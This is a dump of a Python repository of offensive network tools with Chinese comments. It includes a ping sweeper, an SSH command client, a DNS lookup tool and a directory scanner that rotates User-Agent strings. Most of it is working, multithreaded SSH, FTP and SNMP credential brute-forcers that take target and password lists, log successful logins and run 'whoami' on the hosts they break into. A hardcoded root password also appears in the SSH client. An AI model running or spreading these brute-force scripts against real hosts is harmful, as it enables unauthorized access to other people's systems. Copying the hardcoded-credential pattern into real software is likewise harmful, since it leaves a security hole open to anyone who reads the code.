stdout=subprocess.PIPE) # linux 系统将 '-n' 替换成 '-c' 21 | else: 22 | res = subprocess.call('ping -c 2 -w 5 %s' % ip, stdout=subprocess.PIPE) # linux 系统将 '-n' 替换成 '-c' 23 | 24 | # 打印运行结果 25 | # print(ip, "Found" if res == 0 else "Not found") 26 | if res == 0: 27 | print(ip, 'is Alive.') 28 | 29 | 30 | if __name__ == '__main__': 31 | title = ''' 32 | Multithread ping,the defalut threads is 50. 33 | Usage: 34 | python3 ping.py 10.10.10.10 35 | python3 ping.py 10.10.10.10 10.10.10.11 36 | python3 ping.py 10.10.10.10-20 37 | python3 ping.py 10.10.10.10/24 38 | ''' 39 | IP_QUEUE = Queue() 40 | ips = sys.argv 41 | if sys.argv[1] == '-h': 42 | print(title) 43 | if len(sys.argv) == 2: 44 | ips = sys.argv[1] 45 | if '/' in ips: 46 | # 192.168.1.1/24 47 | ip_csection = ips.rsplit('.', 1)[0] 48 | # 将需要 ping 的 ip 加入队列 49 | for i in range(1, 255): 50 | IP_QUEUE.put(ip_csection + '.' + str(i)) 51 | elif '-' in ips: 52 | # 192.168.1.2-10 53 | start_ip = ips.rsplit('-', 1) 54 | ip_csection, start = start_ip[0].rsplit('.', 1) 55 | end = int(start_ip[1]) + 1 56 | for i in range(int(start), end): 57 | IP_QUEUE.put(ip_csection + '.' + str(i)) 58 | else: 59 | IP_QUEUE.put(ips) 60 | else: 61 | ips = sys.argv 62 | for ip in ips: 63 | IP_QUEUE.put(ip) 64 | threads = [] 65 | start_time = time.time() 66 | for i in range(Thread_maxnum): 67 | thread = threading.Thread(target=ping_ip, args=(IP_QUEUE,)) 68 | thread.start() 69 | threads.append(thread) 70 | 71 | for thread in threads: 72 | thread.join() 73 | 74 | print('程序运行耗时:%s' % (time.time() - start_time)) 75 | -------------------------------------------------------------------------------- /MyNointeractive_SSH.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import paramiko 4 | import platform 5 | import re 6 | 7 | ip = "192.168.148.128" 8 | port = "22" 9 | username = "root" 10 | password = "981129" 11 | SSH_CON_TIMEOUT = 10 12 | 13 | 14 | def Nointeractive_SSH(ip, port, username, password, SSH_CON_TIMEOUT=5): 15 | ssh = paramiko.SSHClient() 16 | try: 17 | print('[-] try login ssh {}@{}:{} .....'.format(username, ip, port)) 18 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() 19 | # #加载创建的白名单 20 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 21 | # compress 启用压缩 22 | ssh.connect(ip, port=port, username=username, password=password, compress=True, timeout=SSH_CON_TIMEOUT) 23 | print('[+] Login successfully') 24 | print('[+] username: ', username, ' ,password: ', password) 25 | while True: 26 | print() 27 | cmd = input("shell>") 28 | if cmd == "exit": 29 | exit(0) 30 | else: 31 | stdin, stdout, stderr = ssh.exec_command(cmd) # stdin为输入,stdout为正确输出,stderr为错误输出,同时只有一个变量有值。 32 | printdata(stdout.read().decode('utf-8')) 33 | except Exception as e: 34 | print("Error:", e) 35 | ssh.close() 36 | 37 | 38 | def printdata(data): 39 | if platform.system() == "Windows": 40 | dataa = re.sub(r'\x1b\[.*?m', '', data, flags=re.M) 41 | print(dataa, end='') 42 | elif platform.system() == "Linux": 43 | print(data, end='') 44 | 45 | 46 | if __name__ == '__main__': 47 | usage = """ 48 | Non Interactive SSH connection 49 | Input exit to quit. 50 | """ 51 | parser = argparse.ArgumentParser(usage=usage, description="des") 52 | parser.add_argument("-H", "--host", type=str, dest="host", required=True, help="Hosts to scan") 53 | parser.add_argument("--port", type=int, dest="port", default=22, help="ports to scan") 54 | parser.add_argument("-t", "--timeout", type=int, default=10, dest="timeout", help="Request timeout") 55 | parser.add_argument("-u", "--user", type=str, required=True, dest="username", help="Username") 56 | parser.add_argument("-p", "--pass", type=str, required=True, dest="password", help="Password") 57 | args = parser.parse_args() 58 | 59 | host = args.host 60 | port = args.port 61 | username = args.username 62 | password = args.password 63 | SSH_CON_TIMEOUT = args.timeout 64 | Nointeractive_SSH(host, port, username, password, SSH_CON_TIMEOUT) 65 | -------------------------------------------------------------------------------- /MyNslookup.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | import sys 3 | 4 | """ 5 | Nslookup程序(获取A记录,CNAME,MX,TXT,DNS,MX等信息) 6 | 完成但是有些记录不太行 7 | """ 8 | 9 | 10 | class pynslookup: 11 | def __init__(self, domain='', type=''): 12 | self.domain = domain 13 | self.type = type 14 | 15 | def bytetostring(self, bv): 16 | sv = bv.decode() 17 | return sv 18 | 19 | def getSPFKey(self, domain): 20 | spf = 'spf' + "." + domain 21 | return spf 22 | 23 | def getSPFValue(self, domain): 24 | try: 25 | answersSPF = dns.resolver.resolve(self.getSPFKey(domain), 'TXT') 26 | for rdata in answersSPF: 27 | for txt_string in rdata.strings: 28 | txt_string = self.bytetostring(txt_string) 29 | return txt_string 30 | except dns.resolver.NoAnswer: 31 | # print('NO TXT Record') 32 | return 'None' 33 | 34 | def getTvalue(self, domain): 35 | try: 36 | answersTXT = dns.resolver.resolve(domain, 'TXT') 37 | for tdata in answersTXT: 38 | for txt_string in tdata.strings: 39 | txt_string = self.bytetostring(txt_string) 40 | return txt_string 41 | except dns.resolver.NoAnswer: 42 | # print('NO TXT Record') 43 | return 'None' 44 | 45 | def getMXvalue(self, domain): 46 | try: 47 | resultMX = dns.resolver.resolve(domain, 'MX') 48 | for exdata in resultMX: 49 | res = exdata.to_text() 50 | av = res.split(' ') 51 | return av[1] 52 | except dns.resolver.NoAnswer: 53 | # print('NO MX Record') 54 | return 'None' 55 | 56 | def getCNAMEvalue(self, domain): 57 | try: 58 | result = dns.resolver.resolve(domain, 'CNAME') 59 | # print('result ', result) 60 | for ip in result: 61 | return ip.to_text() 62 | except dns.resolver.NoAnswer: 63 | # print('NO CNAME Record') 64 | return 'None' 65 | 66 | def getAvalue(self, domain): 67 | try: 68 | resultA = dns.resolver.resolve(domain, 'A') 69 | for ip in resultA: 70 | return ip.to_text() 71 | except dns.resolver.NoAnswer: 72 | # print('NO A Record') 73 | return 'None' 74 | 75 | def result(self, domain, type=''): 76 | nslookup_result = {} 77 | if type == '': 78 | nslookup_result['domain'] = domain 79 | nslookup_result['A'] = self.getAvalue(domain) 80 | nslookup_result['CNAME'] = self.getCNAMEvalue(domain) 81 | nslookup_result['MX'] = self.getMXvalue(domain) 82 | nslookup_result['TXT'] = self.getTvalue(domain) 83 | # print(nslookup_result) 84 | return nslookup_result 85 | elif type == 'A': 86 | nslookup_result['domain'] = domain 87 | nslookup_result['A'] = self.getAvalue(domain) 88 | # print(nslookup_result) 89 | return nslookup_result 90 | elif type == 'CNAME': 91 | nslookup_result['domain'] = domain 92 | nslookup_result['CNAME'] = self.getAvalue(domain) 93 | # print(nslookup_result) 94 | return nslookup_result 95 | elif type == 'MX': 96 | nslookup_result['domain'] = domain 97 | nslookup_result['MX'] = self.getAvalue(domain) 98 | # print(nslookup_result) 99 | return nslookup_result 100 | elif type == 'TXT': 101 | nslookup_result['domain'] = domain 102 | nslookup_result['TXT'] = self.getAvalue(domain) 103 | # print(nslookup_result) 104 | return nslookup_result 105 | else: 106 | print('type is error!') 107 | exit(1) 108 | 109 | 110 | if __name__ == '__main__': 111 | title = ''' 112 | Nslookup by Python 113 | Get the record, CNAME, MX, TXT, DNS, MX and other information 114 | Usage: 115 | python3 pynslookup.py www.baidu.com 116 | ''' 117 | params = sys.argv 118 | if sys.argv[1] == '-h': 119 | print(title) 120 | else: 121 | domain = sys.argv[1] 122 | result = pynslookup() 123 | res = result.result(domain) 124 | for k, v in res.items(): 125 | print(k, ': ', v) 126 | # result.result('bilibili.com') 127 | # for k,v in result: 128 | # print(k,': ',v) 129 | 130 | 131 | # 132 | # re = getCNAMEvalue('www.baidu.com') 133 | # print(re) 134 | # re = getAvalue('www.baidu.com') 135 | # print(re) 136 | 137 | # file_r = "wang.txt" 138 | # file_w = "res.json" 139 | # 140 | # with open(file_r, 'r') as file_object_r: 141 | # lines = file_object_r.readlines() 142 | # for line in lines: 143 | # line = line.strip('\n') 144 | # mx = getMXvalue(line) 145 | # ip = getAvalue(getMXvalue(line)) 146 | # txt = getTvalue(line) 147 | # spf = getSPFValue(line) 148 | # res = mx + "#" + ip + "#" + txt + "#" + spf 149 | # with open(file_w, 'a') as file_object_w: 150 | # file_object_w.write(res + '\n') 151 | -------------------------------------------------------------------------------- /MyNslookup2.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/komomon/Mytools/4c2d961b0b1b957675fef5dd7e50f56bfd627fdc/MyNslookup2.py -------------------------------------------------------------------------------- /My_dirscan.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | from queue import Queue 4 | import threading 5 | import random 6 | import csv 7 | import datetime, os 8 | from bs4 import BeautifulSoup 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | 12 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 13 | 14 | ''' 15 | 全类多线程 dirscan 信息扫描 16 | 还是按照原来的思路,扫描封装到类,多线程外挂类似Mywebscan Myportscan 17 | 注意threading.Thread(target)target 不能有括号,否则会线程卡死 18 | ''' 19 | 20 | include_status = "200, 301, 302" 21 | exclude_status = "500, 502" 22 | 23 | 24 | class My_dirscan: 25 | def __init__(self, site=None, queue=None, dict_file=None, outfile=None, include_status=None, timeout=2, ): 26 | self.site = site 27 | self.timeout = timeout 28 | self.queue = queue 29 | self.dict_file = dict_file 30 | self.outfile = outfile 31 | self.include_status = include_status 32 | # 获取字典初始化的时候执行一次就够了,然后往gueue中送数据 33 | self.get_dict_from_file(self.dict_file) 34 | 35 | # 生成随机UA 36 | def random_useragent(self): 37 | USER_AGENTS = [ 38 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 39 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)", 40 | "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 41 | "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)", 42 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)", 43 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)", 44 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)", 45 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)", 46 | "Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6", 47 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1", 48 | "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0", 49 | "Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5", 50 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6", 51 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", 52 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20", 53 | "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52", 54 | ] 55 | return random.choice(USER_AGENTS) 56 | 57 | # 进行扫描获取状态码 58 | def get_status_code(self, url=None): 59 | # 支持http / https 60 | header = {'User-Agent': self.random_useragent()} 61 | try: 62 | # print(url) 63 | res = requests.get(url, headers=header, timeout=2) 64 | res.encoding = "utf-8" 65 | status_code = str(res.status_code) 66 | # print(self.include_status) 67 | # print(type(status_code)) 68 | if status_code in self.include_status: 69 | # sys.stdout.write('\r' + '[+]%s\t\t\n' % url) 70 | result = url + '\t\t' + status_code 71 | print("[+]" + result) 72 | if self.outfile is not None: 73 | self.write_file(result) 74 | else: 75 | pass 76 | except Exception: 77 | pass 78 | 79 | # 获取数据传入管道 80 | def get_dict_from_file(self, dict_file): 81 | with open(dict_file, 'r') as f: 82 | for line in f: 83 | self.queue.put(self.site + '/' + line.strip()) 84 | 85 | def write_file(self, data): 86 | # 如果csvfile是一个文件对象,它应该用newline =''打开。 87 | # with open(self.csvfile, 'a+', newline='')as f: 88 | # # fieldnames = {'URL', 'status_code', 'title', 'timeout', 'headers', 'body'} 89 | # # newline的作用是防止每次插入都有空行 90 | # writer = csv.writer(f) 91 | # writer.writerow(data) 92 | # f = open(datetime.datetime.now().strftime("%Y%m%d%H%M%S") + '.txt', 'a+') 93 | f = open(Outfile, 'a+') 94 | f.write(data + '\n') 95 | f.close() 96 | # print('xieru') 97 | # # 保存到本地文件,以HTML的格式 98 | # result = open('result.html', 'a+') 99 | # result.write('' + url + '') 100 | # result.write('\r\n
') 101 | # result.close() 102 | 103 | def start(self): 104 | while not self.queue.empty(): 105 | url = self.queue.get() 106 | # print(url) 107 | # bot = self.web_banner_scan() 108 | self.get_status_code(url) 109 | # result = self.get_status_code(url) 110 | 111 | 112 | if __name__ == '__main__': 113 | usage = """ 114 | Dir scanner. 115 | """ 116 | parser = argparse.ArgumentParser(usage=usage, description="") 117 | parser.add_argument("-f", "--file", type=str, default=None, dest="file", help="Dict file") 118 | # parser.add_argument("-hb", "--headbody", default=False, action="store_true", dest="saveheadbody", 119 | # help="Store header and body") 120 | parser.add_argument("-o", "--output", type=str, default=None, 121 | dest="outputfile", help="Result to txt") 122 | parser.add_argument("-u", "--url", type=str, default=None, dest="url", help="URL") 123 | parser.add_argument("-s", "--status-code", type=str, default=include_status, dest="include_status", 124 | help="Include status") 125 | parser.add_argument("-t", "--thread", type=int, default=50, dest="threads", help="Threads") 126 | parser.add_argument("--timeout", type=int, default=2, dest="timeout", help="Request timeout") 127 | args = parser.parse_args() 128 | 129 | Site = args.url 130 | Thread_maxnum = args.threads 131 | Timeout = args.timeout 132 | Dict_file = args.file 133 | Outfile = args.outputfile 134 | Include_status = args.include_status.split(',') # 返回list 135 | 136 | URL_QUEUE = Queue() 137 | thread_list = [] 138 | if args.timeout != 0 and args.timeout > 0: 139 | timeout = args.timeout 140 | else: 141 | print("--timeout Setting error.") 142 | exit(1) 143 | dir_scanner_bot = My_dirscan(site=Site, queue=URL_QUEUE, dict_file=Dict_file, outfile=Outfile, 144 | include_status=Include_status, timeout=Timeout) 145 | # web_banner_bot.get_url_from_file(args.file) 146 | # dir_scanner_bot.get_dict_from_file(Dict_file) 147 | print(Thread_maxnum) 148 | for i in range(Thread_maxnum): 149 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 150 | thread = threading.Thread(target=dir_scanner_bot.start) 151 | thread_list.append(thread) 152 | # print(thread_list) 153 | # print(thread_list) 154 | for thread in thread_list: 155 | thread.start() 156 | for thread in thread_list: 157 | thread.join() 158 | 159 | if Outfile is not None: 160 | print("[+] Output save in", os.getcwd() + "\\" + Outfile) 161 | -------------------------------------------------------------------------------- /Mybruster.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import paramiko 4 | import ftplib 5 | import threading 6 | from queue import Queue 7 | 8 | 9 | ''' 10 | Mybruster 11 | 目前实现 SSH爆破,FTP爆破 12 | 13 | 可以实现多ip,多端口,自定义账号密码字典,指定账号,爆破密码,指定密码爆破账号,自定义线程等等情况 14 | 踩坑: 15 | -线程执行函数target不能带括号,否则会阻塞其他线程,使得程序变成单线程程序 16 | - SSH爆破,一个实例化对象,只能去输入一个账号密码,去尝试登陆,如果仅实例化一个对象,分给多个线程去从新获得账号密码尝试登陆,则可能产生报错,所以分配个每个线程一个实例化对象。 17 | - FTP爆破同理,每个线程实例化一个对象。 18 | 19 | ''' 20 | 21 | 22 | class Mybruster: 23 | def __init__(self, mode=None, ip=None, ipfile=None, port=None, queue=None, username=None, password=None, 24 | userfile=None, 25 | passfile=None, timeout=5): 26 | self.mode = mode 27 | self.ip = ip 28 | self.ipfile = ipfile 29 | self.port = port 30 | self.queue = queue 31 | self.username = username 32 | self.password = password 33 | self.userfile = userfile 34 | self.passfile = passfile 35 | self.timeout = timeout 36 | self.ip_success_list = [] 37 | # print(passfile) 38 | # 生产者 初始化执行 39 | self.get_data_from_file(self.ip, self.ipfile, self.username, self.password, self.userfile, self.passfile) 40 | if port is None: 41 | if self.mode == "ssh": 42 | self.port = 22 43 | elif self.mode == "ftp": 44 | self.port = 21 45 | 46 | # 获取数据传入管道 47 | def get_data_from_file(self, ip=None, ipfile=None, username=None, password=None, userfile=None, passfile=None): 48 | # 单IP 49 | # print(ip) 50 | # print(passfile) 51 | if ip is not None: 52 | if userfile is not None and passfile is not None: 53 | with open(userfile, 'r') as f: 54 | with open(passfile, 'r') as g: 55 | for userline in f: 56 | for passline in g: 57 | self.queue.put((ip, userline.strip(), passline.strip())) 58 | # print((ip, userline.strip(), passline.strip())) 59 | elif username is not None and passfile is not None: 60 | with open(passfile, 'r') as g: 61 | for passline in g: 62 | self.queue.put((ip, username, passline.strip())) 63 | # print((ip, username, passline.strip())) 64 | elif username is not None and password is not None: 65 | self.queue.put((ip, username, password)) 66 | print((ip, username, password)) 67 | else: 68 | print("params set error!") 69 | exit(1) 70 | # 多 IP 情况 71 | elif ipfile is not None: 72 | if userfile is not None and passfile is not None: 73 | with open(ipfile, 'r') as e: 74 | with open(userfile, 'r') as f: 75 | with open(passfile, 'r') as g: 76 | for ipline in e: 77 | for userline in f: 78 | for passline in g: 79 | self.queue.put((ipline.strip(), userline.strip(), passline.strip())) 80 | # print((ipline.strip(), userline.strip(), passline.strip())) 81 | elif username is not None and passfile is not None: 82 | with open(ipfile, 'r') as e: 83 | with open(passfile, 'r') as g: 84 | for ipline in e: 85 | for passline in g: 86 | self.queue.put((ipline.strip(), username, passline.strip())) 87 | # print((ip, username, passline.strip())) 88 | elif username is not None and password is not None: 89 | with open(ipfile, 'r') as e: 90 | for ipline in e: 91 | self.queue.put((ipline.strip(), username, password)) 92 | # print((ipline.strip(), username, password)) 93 | else: 94 | print("params set error!") 95 | exit(1) 96 | 97 | def ssh_bruster(self, ip, username, password, port=22, timeout=5): 98 | # pass 99 | try: 100 | print('[*] try login ssh {}@{}:{} .....'.format(username, ip, port)) 101 | ssh_ob = paramiko.SSHClient() 102 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() 103 | # #加载创建的白名单 104 | ssh_ob.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 105 | # compress 启用压缩 106 | ssh_ob.connect(ip, port=int(port), username=username, password=password, compress=True, 107 | timeout=timeout) 108 | stdin, stdout, stderr = ssh_ob.exec_command("whoami") # stdin为输入,stdout为正确输出,stderr为错误输出,同时只有一个变量有值。 109 | # print('[+] Login successfully') 110 | print('[+] Success, {}:{}, username:{}, password:{}, whoami:{}'.format(ip, port, username, password, 111 | stdout.read().decode('utf-8'))) 112 | self.ip_success_list.append(ip) 113 | # self.ssh.close() 114 | return ip 115 | except Exception as e: 116 | # 调试的时候打开下面这句看是什么错误 如果登录不成功会显示如下错误授权失败 Error: Authentication failed. 117 | # print("Error:", e) 118 | ssh_ob.close() 119 | return None 120 | 121 | def ftp_bruster(self, ip, username, password, port=21, timeout=5): 122 | # port = 21 123 | try: 124 | ftp = ftplib.FTP() # 一个线程实例化一个对象,避免冲突 125 | ftp.connect(host=ip, port=int(port), timeout=timeout) 126 | ftp.login(username, password) 127 | # ftp.retrlines('LIST') 128 | ftp.quit() 129 | print('[+] Success, {}:{}, username:{}, password:{}'.format(ip, port, username, password)) 130 | self.ip_success_list.append(ip) 131 | return ip 132 | except ftplib.all_errors: 133 | pass 134 | 135 | # 多线程+ 136 | def start(self): 137 | while not self.queue.empty(): 138 | ip, username, password = self.queue.get() 139 | # 加一个列表,当IP爆破成功后,将IP加入列表,防止其他线程再爆破。 140 | if self.mode == 'ssh': 141 | if ip in self.ip_success_list: 142 | pass 143 | else: 144 | self.ssh_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 145 | elif self.mode == 'ftp': 146 | if ip in self.ip_success_list: 147 | pass 148 | else: 149 | self.ftp_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 150 | else: 151 | print("param -m --mode set error!") 152 | exit(1) 153 | 154 | 155 | if __name__ == '__main__': 156 | usage = """ 157 | Bruster bot By komomon 158 | python test32.py -m ssh -H 192.168.148.128 --user root -pf asdf.txt 159 | python test32.py -m ftp -H 192.168.148.128 -uf user.txt -pf pass.txt 160 | python test32.py -m ssh -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt 161 | python test32.py -m ssh -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 162 | python test32.py -m ssh -if ipfile.txt -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 163 | """ 164 | parser = argparse.ArgumentParser(usage=usage, description="des") 165 | parser.add_argument("-m", "--mode", type=str, dest="mode", required=True, default=None, help="ssh or ftp") 166 | parser.add_argument("-H", "--host", type=str, dest="host", help="Hosts to scan") 167 | parser.add_argument("-if", "--ipfile", type=str, dest="ipfile", help="IP file") 168 | parser.add_argument("-p", "--port", type=int, dest="port", default=None, help="Port to scan") 169 | parser.add_argument("--user", type=str, dest="username", help="Username") 170 | parser.add_argument("--pass", type=str, dest="password", help="Password") 171 | parser.add_argument("-uf", "--userfile", type=str, default=None, dest="userfile", help="Username file") 172 | parser.add_argument("-pf", "--passfile", type=str, default=None, dest="passfile", help="Password file") 173 | parser.add_argument("-t", "--threads", type=int, default=10, dest="threads", help="Threads") 174 | parser.add_argument("--timeout", type=int, default=5, dest="timeout", help="Request timeout") 175 | args = parser.parse_args() 176 | 177 | Mode = args.mode 178 | Host = args.host 179 | Port = args.port 180 | Ipfile = args.ipfile 181 | Username = args.username 182 | Password = args.password 183 | Userfile = args.userfile 184 | Passfile = args.passfile 185 | Thread_maxnum = args.threads 186 | Timeout = args.timeout 187 | print("Bruster bot is running...") 188 | # print(Passfile) 189 | MY_QUEUE = Queue() 190 | thread_list = [] 191 | if args.timeout != 0 and args.timeout > 0: 192 | timeout = args.timeout 193 | else: 194 | print("--timeout Setting error.") 195 | exit(1) 196 | bruster_bot = Mybruster(mode=Mode, ip=Host, ipfile=Ipfile, port=Port, queue=MY_QUEUE, username=Username, password=Password, 197 | userfile=Userfile, passfile=Passfile, timeout=Timeout) 198 | for i in range(Thread_maxnum): 199 | # 注意target参数没有(),有()会线程卡死,应该是根据名称去起线程执行函数 200 | thread = threading.Thread(target=bruster_bot.start) 201 | thread_list.append(thread) 202 | # print(thread_list) 203 | for thread in thread_list: 204 | thread.start() 205 | for thread in thread_list: 206 | thread.join() 207 | -------------------------------------------------------------------------------- /Mybruster_SNMP 函数版.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/ python 2 | # -*- coding: utf-8 -*- 3 | 4 | __author__ = 'yangxiaodi' 5 | # https://www.cnblogs.com/yangxiaodi/p/5660431.html 6 | 7 | from pysnmp.entity.rfc3413.oneliner import cmdgen 8 | 9 | 10 | def read_file(filepath): 11 | f = open(filepath).readlines() 12 | return f 13 | 14 | 15 | def snmp_connect(ip, key): 16 | crack = 0 17 | try: 18 | errorIndication, errorStatus, errorIndex, varBinds = \ 19 | cmdgen.CommandGenerator().getCmd( 20 | cmdgen.CommunityData('my-agent', key, 0), 21 | cmdgen.UdpTransportTarget((ip, 161)), 22 | (1, 3, 6, 1, 2, 1, 1, 1, 0) 23 | ) 24 | if varBinds: 25 | crack = 1 26 | except: 27 | pass 28 | return crack 29 | 30 | 31 | def snmp_l(): 32 | try: 33 | host = read_file('host.txt') 34 | for ip in host: 35 | ip = ip.replace('\n', '') 36 | passd = read_file('pass.txt') 37 | for pwd in passd: 38 | pwd = pwd.replace('\n', '') 39 | flag = snmp_connect(ip, key=pwd) 40 | if flag == 1: 41 | print("%s snmp has weaken password!!-----%s\r\n" % (ip, pwd)) 42 | break 43 | else: 44 | print("test %s snmp's scan fail" % (ip)) 45 | except Exception as e: 46 | pass 47 | 48 | 49 | if __name__ == '__main__': 50 | snmp_l() 51 | -------------------------------------------------------------------------------- /Mybruster_SSH.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import datetime 3 | import paramiko 4 | import platform 5 | import re 6 | import ftplib 7 | import threading 8 | from queue import Queue 9 | 10 | 11 | # ip = "192.168.148.128" 12 | # port = "22" 13 | # username = "root" 14 | # password = "981129" 15 | # SSH_CON_TIMEOUT = 10 16 | ''' 17 | 多线程SSH爆破,可以实现多ip,多端口,自定义账号密码字典,自定义爆破 18 | ''' 19 | 20 | class Mybruster: 21 | def __init__(self, ip=None, ipfile=None, port=None, queue=None, username=None, password=None, userfile=None, 22 | passfile=None, timeout=5): 23 | self.ip = ip 24 | self.ipfile = ipfile 25 | self.port = port 26 | self.queue = queue 27 | self.username = username 28 | self.password = password 29 | self.userfile = userfile 30 | self.passfile = passfile 31 | self.timeout = timeout 32 | # self.ssh = paramiko.SSHClient() # 一个ssh对象只能同一时刻进行一个ssh连接,否则会报错 33 | self.ip_success_list = [] 34 | # print(passfile) 35 | # 生产者 初始化执行 36 | self.get_data_from_file(self.ip, self.ipfile, self.username, self.password, self.userfile, self.passfile) 37 | 38 | # 获取数据传入管道 39 | def get_data_from_file(self, ip=None, ipfile=None, username=None, password=None, userfile=None, passfile=None): 40 | # 单IP 41 | # print(ip) 42 | # print(passfile) 43 | if ip is not None: 44 | if userfile is not None and passfile is not None: 45 | with open(userfile, 'r') as f: 46 | with open(passfile, 'r') as g: 47 | for userline in f: 48 | for passline in g: 49 | self.queue.put((ip, userline.strip(), passline.strip())) 50 | # print((ip, userline.strip(), passline.strip())) 51 | elif username is not None and passfile is not None: 52 | with open(passfile, 'r') as g: 53 | for passline in g: 54 | self.queue.put((ip, username, passline.strip())) 55 | # print((ip, username, passline.strip())) 56 | elif username is not None and password is not None: 57 | self.queue.put((ip, username, password)) 58 | print((ip, username, password)) 59 | else: 60 | print("params set error!") 61 | exit(1) 62 | # 多 IP 情况 63 | elif ipfile is not None: 64 | if userfile is not None and passfile is not None: 65 | with open(ipfile, 'r') as e: 66 | with open(userfile, 'r') as f: 67 | with open(passfile, 'r') as g: 68 | for ipline in e: 69 | for userline in f: 70 | for passline in g: 71 | self.queue.put((ipline.strip(), userline.strip(), passline.strip())) 72 | # print((ipline.strip(), userline.strip(), passline.strip())) 73 | elif username is not None and passfile is not None: 74 | with open(ipfile, 'r') as e: 75 | with open(passfile, 'r') as g: 76 | for ipline in e: 77 | for passline in g: 78 | self.queue.put((ipline.strip(), username, passline.strip())) 79 | # print((ip, username, passline.strip())) 80 | elif username is not None and password is not None: 81 | with open(ipfile, 'r') as e: 82 | for ipline in e: 83 | self.queue.put((ipline.strip(), username, password)) 84 | # print((ipline.strip(), username, password)) 85 | else: 86 | print("params set error!") 87 | exit(1) 88 | 89 | def ssh_bruster(self, ip, port, username, password, timeout=5): 90 | # pass 91 | try: 92 | print('[*] try login ssh {}@{}:{} .....'.format(username, ip, port)) 93 | ssh_ob = paramiko.SSHClient() 94 | # 创建一个ssh的白名单 paramiko.AutoAddPolicy() 95 | # #加载创建的白名单 96 | ssh_ob.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 97 | # compress 启用压缩 98 | ssh_ob.connect(ip, port=int(port), username=username, password=password, compress=True, 99 | timeout=timeout) 100 | stdin, stdout, stderr = ssh_ob.exec_command("whoami") # stdin为输入,stdout为正确输出,stderr为错误输出,同时只有一个变量有值。 101 | # print('[+] Login successfully') 102 | print('[+] Success, {}:{}, username:{}, password:{}, whoami:{}'.format(ip, port, username, password, 103 | stdout.read().decode('utf-8'))) 104 | self.ip_success_list.append(ip) 105 | # self.ssh.close() 106 | return ip 107 | except Exception as e: 108 | # 调试的时候打开下面这句看是什么错误 如果登录不成功会显示如下错误授权失败 Error: Authentication failed. 109 | # print("Error:", e) 110 | ssh_ob.close() 111 | return None 112 | 113 | 114 | # 多线程+ 115 | def start(self): 116 | while not self.queue.empty(): 117 | ip, username, password = self.queue.get() 118 | # 加一个列表,当IP爆破成功后,将IP加入列表,防止其他线程再爆破。 119 | if ip in self.ip_success_list: 120 | pass 121 | else: 122 | self.ssh_bruster(ip=ip, port=self.port, username=username, password=password, timeout=self.timeout) 123 | 124 | 125 | if __name__ == '__main__': 126 | usage = """ 127 | SSH bruster By komomon 128 | python test32.py -H 192.168.148.128 --user root -pf asdf.txt 129 | python test32.py -H 192.168.148.128 -uf user.txt -pf pass.txt 130 | python test32.py -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt 131 | python test32.py -H 192.168.148.128 -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 132 | python test32.py -if ipfile.txt -p 222 -uf user.txt -pf pass.txt -t 50 --timeout=10 133 